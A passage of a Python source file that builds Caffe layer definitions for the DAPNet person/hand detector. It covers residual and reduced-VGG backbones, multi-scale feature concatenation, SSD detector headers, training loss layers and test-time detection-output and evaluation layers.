        top = sb_name
    if use_relu:
        relu_name = '{}_relu'.format(layer_name)
        net[relu_name] = L.ReLU(net[top], in_place=True)
def DAPNet(net, train=True, data_layer="data", gt_label="label", \
           net_width=512, net_height=288):
    """Assemble the full DAP detection network on *net* and return it.

    Pipeline: ResidualVariant_Base_A backbone -> optional hand branch
    (flag_train_withhand) -> conv6 extension -> three two-scale feature
    concatenations (featuremap1..3) -> up to two SSD detector stages whose
    hyper-parameters come from the module-level ssd_Param_1 / ssd_Param_2
    dicts (stage 2 gated by use_ssd2_for_detection).

    Args:
        net: caffe NetSpec to extend in place.
        train: True adds (Dense)BBoxLoss layers; False adds softmax/sigmoid
            post-processing, DetOut layers and a DetEval layer.
        data_layer: name of the input data blob.
        gt_label: name of the ground-truth label blob.
        net_width, net_height: input resolution forwarded to the SSD headers.

    Returns:
        The same NetSpec with all layers attached.
    """
    lr_basenet = 1.0
    # BaseNet
    use_sub_layers = (6, 7)
    num_channels = (144, 288)
    output_channels = (128, 0)
    channel_scale = 4
    add_strs = "_recon"
    net = ResidualVariant_Base_A(net, data_layer=data_layer, use_sub_layers=use_sub_layers, num_channels=num_channels,
                output_channels=output_channels,channel_scale=channel_scale,lr=lr_basenet, decay=1, add_strs=add_strs,)
    if flag_train_withhand:
        # Hand branch: a 3x3 conv on pool1 plus a 2x deconv of conv2_4,
        # concatenated channel-wise into "featuremap0".
        use_bn = True
        from_layer = "pool1_recon"
        out_layer = 'conv2_hand'
        ConvBNUnitLayer(net, from_layer, out_layer, use_bn=use_bn, use_relu=True,
                num_output=32, kernel_size=3, pad=1, stride=1, use_scale=True, leaky=False, lr_mult=1,
                decay_mult=1)
        from_layer = "conv2_4_recon_relu"
        Deconv(net, from_layer, num_output=64, group=1, kernel_size=2, stride=2, lr_mult=1.0, decay_mult=1.0,
               use_bn=True, use_scale=True,use_relu=True)
        feature_layers = []
        feature_layers.append(net["conv2_hand"])
        feature_layers.append(net["conv2_4_recon_relu_deconv"])
        add_layer = "featuremap0"
        net[add_layer] = L.Concat(*feature_layers, axis=1)
    lr_detnetperson = 1.0
    # Add Conv6
    conv6_output = Conv6_Param.get('conv6_output',[])
    conv6_kernal_size = Conv6_Param.get('conv6_kernal_size',[])
    out_layer = "conv3_7_recon_relu"
    net = addconv6(net, from_layer=out_layer, use_bn=True, conv6_output=conv6_output, \
        conv6_kernal_size=conv6_kernal_size, pre_name="conv6",start_pool=True,lr_mult=lr_detnetperson, decay_mult=1,n_group=1)
    # Concat FM1 & FM2 & FM3 for Detection: each feature map pairs a
    # down-sampled shallower layer ("Down"/MaxPool) with a reference layer.
    featuremap1 = ["pool1_recon","conv2_6_recon_relu"]
    tags = ["Down","Ref"]
    down_methods = [["MaxPool"]]
    out_layer = "featuremap1"
    UnifiedMultiScaleLayers(net,layers=featuremap1, tags=tags, unifiedlayer=out_layer, dnsampleMethod=down_methods)
    # Concat FM2
    featuremap2 = ["conv2_6_recon_relu","conv3_7_recon_relu"]
    tags = ["Down","Ref"]
    down_methods = [["MaxPool"]]
    out_layer = "featuremap2"
    UnifiedMultiScaleLayers(net,layers=featuremap2, tags=tags, unifiedlayer=out_layer, dnsampleMethod=down_methods)
    # Concat FM3
    c6_layer = 'conv6_{}'.format(len(Conv6_Param['conv6_output']))
    featuremap3 = ["conv3_7_recon_relu",c6_layer]
    tags = ["Down","Ref"]
    down_methods = [["MaxPool"]]
    out_layer = "featuremap3"
    UnifiedMultiScaleLayers(net,layers=featuremap3, tags=tags, unifiedlayer=out_layer, dnsampleMethod=down_methods)
    # Create SSD Header for SSD1
    if flag_train_withperson:
        mbox_1_layers = SsdDetectorHeaders(net, \
             net_width=net_width, net_height=net_height, data_layer=data_layer, \
             from_layers=ssd_Param_1.get('feature_layers',[]), \
             num_classes=ssd_Param_1.get("num_classes",2), \
             boxsizes=ssd_Param_1.get("anchor_boxsizes", []), \
             aspect_ratios=ssd_Param_1.get("anchor_aspect_ratios",[]), \
             prior_variance = ssd_Param_1.get("anchor_prior_variance",[0.1,0.1,0.2,0.2]), \
             flip=ssd_Param_1.get("anchor_flip",True), \
             clip=ssd_Param_1.get("anchor_clip",True), \
             normalizations=ssd_Param_1.get("interlayers_normalizations",[]), \
             use_batchnorm=ssd_Param_1.get("interlayers_use_batchnorm",True), \
             inter_layer_channels=ssd_Param_1.get("interlayers_channels_kernels",[]), \
             use_focus_loss=ssd_Param_1.get("bboxloss_using_focus_loss",False), \
             use_dense_boxes=ssd_Param_1.get('bboxloss_use_dense_boxes',False), \
             stage=1,lr_mult=lr_detnetperson)
        # make Loss or Detout for SSD1
        if train:
            loss_param = get_loss_param(normalization=ssd_Param_1.get("bboxloss_normalization",P.Loss.VALID))
            mbox_1_layers.append(net[gt_label])
            use_dense_boxes = ssd_Param_1.get('bboxloss_use_dense_boxes',False)
            if use_dense_boxes:
                # Dense-box variant: LOGISTIC conf loss by default.
                bboxloss_param = {
                    'gt_labels': ssd_Param_1.get('gt_labels',[]),
                    'target_labels': ssd_Param_1.get('target_labels',[]),
                    'num_classes':ssd_Param_1.get("num_classes",2),
                    'alias_id':ssd_Param_1.get("alias_id",0),
                    'loc_loss_type':ssd_Param_1.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
                    'conf_loss_type':ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.LOGISTIC),
                    'loc_weight':ssd_Param_1.get("bboxloss_loc_weight",1),
                    'conf_weight':ssd_Param_1.get("bboxloss_conf_weight",1),
                    'overlap_threshold':ssd_Param_1.get("bboxloss_overlap_threshold",0.5),
                    'neg_overlap':ssd_Param_1.get("bboxloss_neg_overlap",0.5),
                    'size_threshold':ssd_Param_1.get("bboxloss_size_threshold",0.0001),
                    'do_neg_mining':ssd_Param_1.get("bboxloss_do_neg_mining",True),
                    'neg_pos_ratio':ssd_Param_1.get("bboxloss_neg_pos_ratio",3),
                    'using_focus_loss':ssd_Param_1.get("bboxloss_using_focus_loss",False),
                    'gama':ssd_Param_1.get("bboxloss_focus_gama",2),
                    'use_difficult_gt':ssd_Param_1.get("bboxloss_use_difficult_gt",False),
                    'code_type':ssd_Param_1.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
                    'use_prior_for_matching':True,
                    'encode_variance_in_target': False,
                    'flag_noperson':ssd_Param_1.get('flag_noperson',False),
                }
                net["mbox_1_loss"] = L.DenseBBoxLoss(*mbox_1_layers, dense_bbox_loss_param=bboxloss_param, \
                                        loss_param=loss_param, include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
                                        propagate_down=[True, True, False, False])
            else:
                # Standard variant: SOFTMAX conf loss by default.
                bboxloss_param = {
                    'gt_labels': ssd_Param_1.get('gt_labels',[]),
                    'target_labels': ssd_Param_1.get('target_labels',[]),
                    'num_classes':ssd_Param_1.get("num_classes",2),
                    'alias_id':ssd_Param_1.get("alias_id",0),
                    'loc_loss_type':ssd_Param_1.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
                    'conf_loss_type':ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX),
                    'loc_weight':ssd_Param_1.get("bboxloss_loc_weight",1),
                    'conf_weight':ssd_Param_1.get("bboxloss_conf_weight",1),
                    'overlap_threshold':ssd_Param_1.get("bboxloss_overlap_threshold",0.5),
                    'neg_overlap':ssd_Param_1.get("bboxloss_neg_overlap",0.5),
                    'size_threshold':ssd_Param_1.get("bboxloss_size_threshold",0.0001),
                    'do_neg_mining':ssd_Param_1.get("bboxloss_do_neg_mining",True),
                    'neg_pos_ratio':ssd_Param_1.get("bboxloss_neg_pos_ratio",3),
                    'using_focus_loss':ssd_Param_1.get("bboxloss_using_focus_loss",False),
                    'gama':ssd_Param_1.get("bboxloss_focus_gama",2),
                    'use_difficult_gt':ssd_Param_1.get("bboxloss_use_difficult_gt",False),
                    'code_type':ssd_Param_1.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
                    'match_type':P.MultiBoxLoss.PER_PREDICTION,
                    'share_location':True,
                    'use_prior_for_matching':True,
                    'background_label_id':0,
                    'encode_variance_in_target': False,
                    'map_object_to_agnostic':False,
                }
                net["mbox_1_loss"] = L.BBoxLoss(*mbox_1_layers, bbox_loss_param=bboxloss_param, \
                                        loss_param=loss_param,include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
                                        propagate_down=[True, True, False, False])
        else:
            # Test mode: turn raw confidences into probabilities first.
            if ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.SOFTMAX:
                reshape_name = "mbox_1_conf_reshape"
                net[reshape_name] = L.Reshape(mbox_1_layers[1], \
                        shape=dict(dim=[0, -1, ssd_Param_1.get("num_classes",2)]))
                softmax_name = "mbox_1_conf_softmax"
                net[softmax_name] = L.Softmax(net[reshape_name], axis=2)
                flatten_name = "mbox_1_conf_flatten"
                net[flatten_name] = L.Flatten(net[softmax_name], axis=1)
                mbox_1_layers[1] = net[flatten_name]
            elif ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.LOGISTIC:
                sigmoid_name = "mbox_1_conf_sigmoid"
                net[sigmoid_name] = L.Sigmoid(mbox_1_layers[1])
                mbox_1_layers[1] = net[sigmoid_name]
            else:
                raise ValueError("Unknown conf loss type.")
            # Det-out param
            det_out_param = {
                'num_classes':ssd_Param_1.get("num_classes",2),
                'target_labels': ssd_Param_1.get('detout_target_labels',[]),
                'alias_id':ssd_Param_1.get("alias_id",0),
                'conf_threshold':ssd_Param_1.get("detout_conf_threshold",0.01),
                'nms_threshold':ssd_Param_1.get("detout_nms_threshold",0.45),
                'size_threshold':ssd_Param_1.get("detout_size_threshold",0.0001),
                'top_k':ssd_Param_1.get("detout_top_k",30),
                'share_location':True,
                'code_type':P.PriorBox.CENTER_SIZE,
                'background_label_id':0,
                'variance_encoded_in_target':False,
            }
            use_dense_boxes = ssd_Param_1.get('bboxloss_use_dense_boxes',False)
            if use_dense_boxes:
                net.detection_out_1 = L.DenseDetOut(*mbox_1_layers, \
                        detection_output_param=det_out_param, \
                        include=dict(phase=caffe_pb2.Phase.Value('TEST')))
            else:
                net.detection_out_1 = L.DetOut(*mbox_1_layers, \
                        detection_output_param=det_out_param, \
                        include=dict(phase=caffe_pb2.Phase.Value('TEST')))
    # make Loss & Detout for SSD2 — mirrors the SSD1 branch above but driven
    # by ssd_Param_2 (and without the per-stage lr_mult override).
    if use_ssd2_for_detection:
        mbox_2_layers = SsdDetectorHeaders(net, \
             net_width=net_width, net_height=net_height, data_layer=data_layer, \
             from_layers=ssd_Param_2.get('feature_layers',[]), \
             num_classes=ssd_Param_2.get("num_classes",2), \
             boxsizes=ssd_Param_2.get("anchor_boxsizes", []), \
             aspect_ratios=ssd_Param_2.get("anchor_aspect_ratios",[]), \
             prior_variance = ssd_Param_2.get("anchor_prior_variance",[0.1,0.1,0.2,0.2]), \
             flip=ssd_Param_2.get("anchor_flip",True), \
             clip=ssd_Param_2.get("anchor_clip",True), \
             normalizations=ssd_Param_2.get("interlayers_normalizations",[]), \
             use_batchnorm=ssd_Param_2.get("interlayers_use_batchnorm",True), \
             inter_layer_channels=ssd_Param_2.get("interlayers_channels_kernels",[]), \
             use_focus_loss=ssd_Param_2.get("bboxloss_using_focus_loss",False), \
             use_dense_boxes=ssd_Param_2.get('bboxloss_use_dense_boxes',False), \
             stage=2)
        # make Loss or Detout for SSD2
        if train:
            loss_param = get_loss_param(normalization=ssd_Param_2.get("bboxloss_normalization",P.Loss.VALID))
            mbox_2_layers.append(net[gt_label])
            use_dense_boxes = ssd_Param_2.get('bboxloss_use_dense_boxes',False)
            if use_dense_boxes:
                bboxloss_param = {
                    'gt_labels': ssd_Param_2.get('gt_labels',[]),
                    'target_labels': ssd_Param_2.get('target_labels',[]),
                    'num_classes':ssd_Param_2.get("num_classes",2),
                    'alias_id':ssd_Param_2.get("alias_id",0),
                    'loc_loss_type':ssd_Param_2.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
                    'conf_loss_type':ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.LOGISTIC),
                    'loc_weight':ssd_Param_2.get("bboxloss_loc_weight",1),
                    'conf_weight':ssd_Param_2.get("bboxloss_conf_weight",1),
                    'overlap_threshold':ssd_Param_2.get("bboxloss_overlap_threshold",0.5),
                    'neg_overlap':ssd_Param_2.get("bboxloss_neg_overlap",0.5),
                    'size_threshold':ssd_Param_2.get("bboxloss_size_threshold",0.0001),
                    'do_neg_mining':ssd_Param_2.get("bboxloss_do_neg_mining",True),
                    'neg_pos_ratio':ssd_Param_2.get("bboxloss_neg_pos_ratio",3),
                    'using_focus_loss':ssd_Param_2.get("bboxloss_using_focus_loss",False),
                    'gama':ssd_Param_2.get("bboxloss_focus_gama",2),
                    'use_difficult_gt':ssd_Param_2.get("bboxloss_use_difficult_gt",False),
                    'code_type':ssd_Param_2.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
                    'use_prior_for_matching':True,
                    'encode_variance_in_target': False,
                    'flag_noperson': ssd_Param_2.get('flag_noperson', False),
                }
                net["mbox_2_loss"] = L.DenseBBoxLoss(*mbox_2_layers, dense_bbox_loss_param=bboxloss_param, \
                                        loss_param=loss_param, include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
                                        propagate_down=[True, True, False, False])
            else:
                bboxloss_param = {
                    'gt_labels': ssd_Param_2.get('gt_labels',[]),
                    'target_labels': ssd_Param_2.get('target_labels',[]),
                    'num_classes':ssd_Param_2.get("num_classes",2),
                    'alias_id':ssd_Param_2.get("alias_id",0),
                    'loc_loss_type':ssd_Param_2.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
                    'conf_loss_type':ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX),
                    'loc_weight':ssd_Param_2.get("bboxloss_loc_weight",1),
                    'conf_weight':ssd_Param_2.get("bboxloss_conf_weight",1),
                    'overlap_threshold':ssd_Param_2.get("bboxloss_overlap_threshold",0.5),
                    'neg_overlap':ssd_Param_2.get("bboxloss_neg_overlap",0.5),
                    'size_threshold':ssd_Param_2.get("bboxloss_size_threshold",0.0001),
                    'do_neg_mining':ssd_Param_2.get("bboxloss_do_neg_mining",True),
                    'neg_pos_ratio':ssd_Param_2.get("bboxloss_neg_pos_ratio",3),
                    'using_focus_loss':ssd_Param_2.get("bboxloss_using_focus_loss",False),
                    'gama':ssd_Param_2.get("bboxloss_focus_gama",2),
                    'use_difficult_gt':ssd_Param_2.get("bboxloss_use_difficult_gt",False),
                    'code_type':ssd_Param_2.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
                    'match_type':P.MultiBoxLoss.PER_PREDICTION,
                    'share_location':True,
                    'use_prior_for_matching':True,
                    'background_label_id':0,
                    'encode_variance_in_target': False,
                    'map_object_to_agnostic':False,
                }
                net["mbox_2_loss"] = L.BBoxLoss(*mbox_2_layers, bbox_loss_param=bboxloss_param, \
                                        loss_param=loss_param,include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
                                        propagate_down=[True, True, False, False])
        else:
            if ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.SOFTMAX:
                reshape_name = "mbox_2_conf_reshape"
                net[reshape_name] = L.Reshape(mbox_2_layers[1], \
                        shape=dict(dim=[0, -1, ssd_Param_2.get("num_classes",2)]))
                softmax_name = "mbox_2_conf_softmax"
                net[softmax_name] = L.Softmax(net[reshape_name], axis=2)
                flatten_name = "mbox_2_conf_flatten"
                net[flatten_name] = L.Flatten(net[softmax_name], axis=1)
                mbox_2_layers[1] = net[flatten_name]
            elif ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.LOGISTIC:
                sigmoid_name = "mbox_2_conf_sigmoid"
                net[sigmoid_name] = L.Sigmoid(mbox_2_layers[1])
                mbox_2_layers[1] = net[sigmoid_name]
            else:
                raise ValueError("Unknown conf loss type.")
            # Det-out param
            det_out_param = {
                'num_classes':ssd_Param_2.get("num_classes",2),
                'target_labels': ssd_Param_2.get('detout_target_labels',[]),
                'alias_id':ssd_Param_2.get("alias_id",0),
                'conf_threshold':ssd_Param_2.get("detout_conf_threshold",0.01),
                'nms_threshold':ssd_Param_2.get("detout_nms_threshold",0.45),
                'size_threshold':ssd_Param_2.get("detout_size_threshold",0.0001),
                'top_k':ssd_Param_2.get("detout_top_k",30),
                'share_location':True,
                'code_type':P.PriorBox.CENTER_SIZE,
                'background_label_id':0,
                'variance_encoded_in_target':False,
            }
            use_dense_boxes = ssd_Param_2.get('bboxloss_use_dense_boxes',False)
            if use_dense_boxes:
                net.detection_out_2 = L.DenseDetOut(*mbox_2_layers, \
                        detection_output_param=det_out_param, \
                        include=dict(phase=caffe_pb2.Phase.Value('TEST')))
            else:
                net.detection_out_2 = L.DetOut(*mbox_2_layers, \
                        detection_output_param=det_out_param, \
                        include=dict(phase=caffe_pb2.Phase.Value('TEST')))
    # EVAL in TEST MODE: concatenate all detection outputs and score them.
    if not train:
        det_eval_param = {
            'gt_labels': eval_Param.get('eval_gt_labels',[]),
            'num_classes':eval_Param.get("eval_num_classes",2),
            'evaluate_difficult_gt':eval_Param.get("eval_difficult_gt",False),
            'boxsize_threshold':eval_Param.get("eval_boxsize_threshold",[0,0.01,0.05,0.1,0.15,0.2,0.25]),
            'iou_threshold':eval_Param.get("eval_iou_threshold",[0.9,0.75,0.5]),
            'background_label_id':0,
        }
        if use_ssd2_for_detection:
            det_out_layers = []
            if flag_train_withperson:
                det_out_layers.append(net['detection_out_1'])
            det_out_layers.append(net['detection_out_2'])
            name = 'det_out'
            net[name] = L.Concat(*det_out_layers, axis=2)
            net.det_accu = L.DetEval(net[name], net[gt_label], \
                    detection_evaluate_param=det_eval_param, \
                    include=dict(phase=caffe_pb2.Phase.Value('TEST')))
        else:
            # NOTE(review): assumes flag_train_withperson is True here, else
            # 'detection_out_1' was never created — confirm with callers.
            net.det_accu = L.DetEval(net['detection_out_1'], net[gt_label], \
                    detection_evaluate_param=det_eval_param, \
                    include=dict(phase=caffe_pb2.Phase.Value('TEST')))
    return net
def DAPNetVGGReduce(net, train=True, data_layer="data", gt_label="label", \
                    net_width=512, net_height=288):
    """Build the DAPNet detection graph on a reduced-VGG backbone.

    Registers the backbone, three multi-scale feature concats
    (featuremap1..3), the SSD detection headers, and either loss layers
    (train) or detection-output/eval layers (test) into ``net``, then
    returns ``net``.

    Args:
        net: Caffe NetSpec-like object supporting ``net[name] = layer``.
        train: if True emit BBox loss layers (TRAIN phase); if False emit
            conf-transform + DetOut layers and DetEval (TEST phase).
        data_layer: name of the input data blob.
        gt_label: name of the ground-truth label blob.
        net_width, net_height: input resolution forwarded to the SSD headers.

    Returns:
        The same ``net`` object with all layers registered.

    Raises:
        ValueError: if the configured conf loss type is neither SOFTMAX
            nor LOGISTIC (test-mode conf transform).

    NOTE(review): depends on module-level configuration and helpers not
    visible here (ssd_Param_1, ssd_Param_2, eval_Param, Conv6_Param,
    flag_train_withperson, use_ssd2_for_detection, YoloNetPart,
    VGG16_BaseNet_ChangeChannel, addconv6, UnifiedMultiScaleLayers,
    SsdDetectorHeaders, get_loss_param) — presumably defined earlier in
    this file; confirm before reuse.
    """
    # ---------------- BaseNet ----------------
    # Hard-coded switch: False selects the reduced-VGG backbone below.
    flag_use_dark = False
    if flag_use_dark:
        net = YoloNetPart(net, from_layer="data", use_bn=True, use_layers=5, use_sub_layers=5, final_pool=True, lr=1,
                          decay=1)#1.47G, 13.7M
    else:
        # Earlier channel configuration kept for reference:
        # c = ((32,), (32,), (32, 32, 128), (64, 64, 128), (128, 128, 256))#1.74G, 19.43M
        # net = VGG16_BaseNet_ChangeChannel(net, "data", channels=c)
        channels = ((32,), (32,), (64, 32, 128), (128, 64, 128, 64, 256), (256, 128, 256, 128, 256))
        strides = (True, True, True, False, False)
        kernels = ((3,), (3,), (3, 1, 3), (3, 1, 3, 1, 3), (3, 1, 3, 1, 3))
        pool_last = (False,False,False,True,True)
        net = VGG16_BaseNet_ChangeChannel(net, from_layer=data_layer, channels=channels, strides=strides,
                                          kernels=kernels,freeze_layers=[], pool_last=pool_last)
    # lr multiplier for the person-detection branch (conv6 + SSD1 headers).
    lr_detnetperson = 1.0
    # ---------------- Conv6 on top of pool5 ----------------
    conv6_output = Conv6_Param.get('conv6_output',[])
    conv6_kernal_size = Conv6_Param.get('conv6_kernal_size',[])
    out_layer = "pool5"
    net = addconv6(net, from_layer=out_layer, use_bn=True, conv6_output=conv6_output, \
        conv6_kernal_size=conv6_kernal_size, pre_name="conv6",start_pool=False,lr_mult=lr_detnetperson, decay_mult=1,n_group=1)
    # Concat FM1 for detection: pool2 (max-pool down-sampled) onto pool3 (reference scale).
    featuremap1 = ["pool2","pool3"]
    tags = ["Down","Ref"]
    down_methods = [["MaxPool"]]
    out_layer = "featuremap1"
    UnifiedMultiScaleLayers(net,layers=featuremap1, tags=tags, unifiedlayer=out_layer, dnsampleMethod=down_methods)
    # Concat FM2: pool3 (down-sampled) onto pool4 (reference scale).
    featuremap2 = ["pool3","pool4"]
    tags = ["Down","Ref"]
    down_methods = [["MaxPool"]]
    out_layer = "featuremap2"
    UnifiedMultiScaleLayers(net,layers=featuremap2, tags=tags, unifiedlayer=out_layer, dnsampleMethod=down_methods)
    # Concat FM3: pool5 with the last conv6 layer (both at reference scale).
    c6_layer = 'conv6_{}'.format(len(Conv6_Param['conv6_output']))
    featuremap3 = ["pool5",c6_layer]
    tags = ["Ref","Ref"]
    down_methods = [["MaxPool"]]
    out_layer = "featuremap3"
    UnifiedMultiScaleLayers(net,layers=featuremap3, tags=tags, unifiedlayer=out_layer, dnsampleMethod=down_methods)
    # ---------------- SSD1 (person branch, gated by flag_train_withperson) ----------------
    if flag_train_withperson:
        # mbox_1_layers is [loc, conf, priorbox] as produced by SsdDetectorHeaders.
        mbox_1_layers = SsdDetectorHeaders(net, \
            net_width=net_width, net_height=net_height, data_layer=data_layer, \
            from_layers=ssd_Param_1.get('feature_layers',[]), \
            num_classes=ssd_Param_1.get("num_classes",2), \
            boxsizes=ssd_Param_1.get("anchor_boxsizes", []), \
            aspect_ratios=ssd_Param_1.get("anchor_aspect_ratios",[]), \
            prior_variance = ssd_Param_1.get("anchor_prior_variance",[0.1,0.1,0.2,0.2]), \
            flip=ssd_Param_1.get("anchor_flip",True), \
            clip=ssd_Param_1.get("anchor_clip",True), \
            normalizations=ssd_Param_1.get("interlayers_normalizations",[]), \
            use_batchnorm=ssd_Param_1.get("interlayers_use_batchnorm",True), \
            inter_layer_channels=ssd_Param_1.get("interlayers_channels_kernels",[]), \
            use_focus_loss=ssd_Param_1.get("bboxloss_using_focus_loss",False), \
            use_dense_boxes=ssd_Param_1.get('bboxloss_use_dense_boxes',False), \
            stage=1,lr_mult=lr_detnetperson)
        # TRAIN: attach a bbox loss; TEST: transform conf and attach DetOut.
        if train:
            loss_param = get_loss_param(normalization=ssd_Param_1.get("bboxloss_normalization",P.Loss.VALID))
            mbox_1_layers.append(net[gt_label])
            use_dense_boxes = ssd_Param_1.get('bboxloss_use_dense_boxes',False)
            if use_dense_boxes:
                # Dense-box variant: LOGISTIC conf loss by default.
                bboxloss_param = {
                    'gt_labels': ssd_Param_1.get('gt_labels',[]),
                    'target_labels': ssd_Param_1.get('target_labels',[]),
                    'num_classes':ssd_Param_1.get("num_classes",2),
                    'alias_id':ssd_Param_1.get("alias_id",0),
                    'loc_loss_type':ssd_Param_1.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
                    'conf_loss_type':ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.LOGISTIC),
                    'loc_weight':ssd_Param_1.get("bboxloss_loc_weight",1),
                    'conf_weight':ssd_Param_1.get("bboxloss_conf_weight",1),
                    'overlap_threshold':ssd_Param_1.get("bboxloss_overlap_threshold",0.5),
                    'neg_overlap':ssd_Param_1.get("bboxloss_neg_overlap",0.5),
                    'size_threshold':ssd_Param_1.get("bboxloss_size_threshold",0.0001),
                    'do_neg_mining':ssd_Param_1.get("bboxloss_do_neg_mining",True),
                    'neg_pos_ratio':ssd_Param_1.get("bboxloss_neg_pos_ratio",3),
                    'using_focus_loss':ssd_Param_1.get("bboxloss_using_focus_loss",False),
                    'gama':ssd_Param_1.get("bboxloss_focus_gama",2),
                    'use_difficult_gt':ssd_Param_1.get("bboxloss_use_difficult_gt",False),
                    'code_type':ssd_Param_1.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
                    'use_prior_for_matching':True,
                    'encode_variance_in_target': False,
                    'flag_noperson':ssd_Param_1.get('flag_noperson',False),
                }
                # propagate_down: gradients flow to loc/conf only, not priors/labels.
                net["mbox_1_loss"] = L.DenseBBoxLoss(*mbox_1_layers, dense_bbox_loss_param=bboxloss_param, \
                    loss_param=loss_param, include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
                    propagate_down=[True, True, False, False])
            else:
                # Standard SSD variant: SOFTMAX conf loss by default.
                bboxloss_param = {
                    'gt_labels': ssd_Param_1.get('gt_labels',[]),
                    'target_labels': ssd_Param_1.get('target_labels',[]),
                    'num_classes':ssd_Param_1.get("num_classes",2),
                    'alias_id':ssd_Param_1.get("alias_id",0),
                    'loc_loss_type':ssd_Param_1.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
                    'conf_loss_type':ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX),
                    'loc_weight':ssd_Param_1.get("bboxloss_loc_weight",1),
                    'conf_weight':ssd_Param_1.get("bboxloss_conf_weight",1),
                    'overlap_threshold':ssd_Param_1.get("bboxloss_overlap_threshold",0.5),
                    'neg_overlap':ssd_Param_1.get("bboxloss_neg_overlap",0.5),
                    'size_threshold':ssd_Param_1.get("bboxloss_size_threshold",0.0001),
                    'do_neg_mining':ssd_Param_1.get("bboxloss_do_neg_mining",True),
                    'neg_pos_ratio':ssd_Param_1.get("bboxloss_neg_pos_ratio",3),
                    'using_focus_loss':ssd_Param_1.get("bboxloss_using_focus_loss",False),
                    'gama':ssd_Param_1.get("bboxloss_focus_gama",2),
                    'use_difficult_gt':ssd_Param_1.get("bboxloss_use_difficult_gt",False),
                    'code_type':ssd_Param_1.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
                    'match_type':P.MultiBoxLoss.PER_PREDICTION,
                    'share_location':True,
                    'use_prior_for_matching':True,
                    'background_label_id':0,
                    'encode_variance_in_target': False,
                    'map_object_to_agnostic':False,
                }
                net["mbox_1_loss"] = L.BBoxLoss(*mbox_1_layers, bbox_loss_param=bboxloss_param, \
                    loss_param=loss_param,include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
                    propagate_down=[True, True, False, False])
        else:
            # TEST mode: convert raw conf logits to probabilities before DetOut.
            if ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.SOFTMAX:
                reshape_name = "mbox_1_conf_reshape"
                net[reshape_name] = L.Reshape(mbox_1_layers[1], \
                    shape=dict(dim=[0, -1, ssd_Param_1.get("num_classes",2)]))
                softmax_name = "mbox_1_conf_softmax"
                net[softmax_name] = L.Softmax(net[reshape_name], axis=2)
                flatten_name = "mbox_1_conf_flatten"
                net[flatten_name] = L.Flatten(net[softmax_name], axis=1)
                mbox_1_layers[1] = net[flatten_name]
            elif ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.LOGISTIC:
                sigmoid_name = "mbox_1_conf_sigmoid"
                net[sigmoid_name] = L.Sigmoid(mbox_1_layers[1])
                mbox_1_layers[1] = net[sigmoid_name]
            else:
                raise ValueError("Unknown conf loss type.")
            # Detection-output (NMS) parameters for SSD1.
            det_out_param = {
                'num_classes':ssd_Param_1.get("num_classes",2),
                'target_labels': ssd_Param_1.get('detout_target_labels',[]),
                'alias_id':ssd_Param_1.get("alias_id",0),
                'conf_threshold':ssd_Param_1.get("detout_conf_threshold",0.01),
                'nms_threshold':ssd_Param_1.get("detout_nms_threshold",0.45),
                'size_threshold':ssd_Param_1.get("detout_size_threshold",0.0001),
                'top_k':ssd_Param_1.get("detout_top_k",30),
                'share_location':True,
                'code_type':P.PriorBox.CENTER_SIZE,
                'background_label_id':0,
                'variance_encoded_in_target':False,
            }
            use_dense_boxes = ssd_Param_1.get('bboxloss_use_dense_boxes',False)
            if use_dense_boxes:
                net.detection_out_1 = L.DenseDetOut(*mbox_1_layers, \
                    detection_output_param=det_out_param, \
                    include=dict(phase=caffe_pb2.Phase.Value('TEST')))
            else:
                net.detection_out_1 = L.DetOut(*mbox_1_layers, \
                    detection_output_param=det_out_param, \
                    include=dict(phase=caffe_pb2.Phase.Value('TEST')))
    # ---------------- SSD2 (second detection branch) ----------------
    if use_ssd2_for_detection:
        mbox_2_layers = SsdDetectorHeaders(net, \
            net_width=net_width, net_height=net_height, data_layer=data_layer, \
            from_layers=ssd_Param_2.get('feature_layers',[]), \
            num_classes=ssd_Param_2.get("num_classes",2), \
            boxsizes=ssd_Param_2.get("anchor_boxsizes", []), \
            aspect_ratios=ssd_Param_2.get("anchor_aspect_ratios",[]), \
            prior_variance = ssd_Param_2.get("anchor_prior_variance",[0.1,0.1,0.2,0.2]), \
            flip=ssd_Param_2.get("anchor_flip",True), \
            clip=ssd_Param_2.get("anchor_clip",True), \
            normalizations=ssd_Param_2.get("interlayers_normalizations",[]), \
